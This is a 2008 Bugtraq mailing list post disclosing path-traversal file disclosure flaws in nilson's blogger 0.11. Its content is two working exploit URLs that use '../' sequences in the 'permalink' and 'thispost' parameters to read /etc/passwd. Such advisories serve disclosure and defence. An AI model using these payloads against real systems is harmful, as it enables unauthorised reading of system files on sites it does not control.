Bugtraq mailing list archives

nilson's blogger 0.11 remote file disclosure vulnerabilities


From: "muuratsalo experimental hack lab" <muuratsalo () gmail com>
Date: Thu, 31 Jan 2008 20:56:34 +0100

nilson's blogger 0.11 remote file disclosure vulnerabilities

download   http://sourceforge.net/projects/nilson-blogger/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
http://localhost/nilson-blogger0.11/index.php?permalink=../../../../../../../../../../etc/passwd
http://localhost/nilson-blogger0.11/comments.php?thispost=../../../../../../../../../../etc/passwd


Current thread: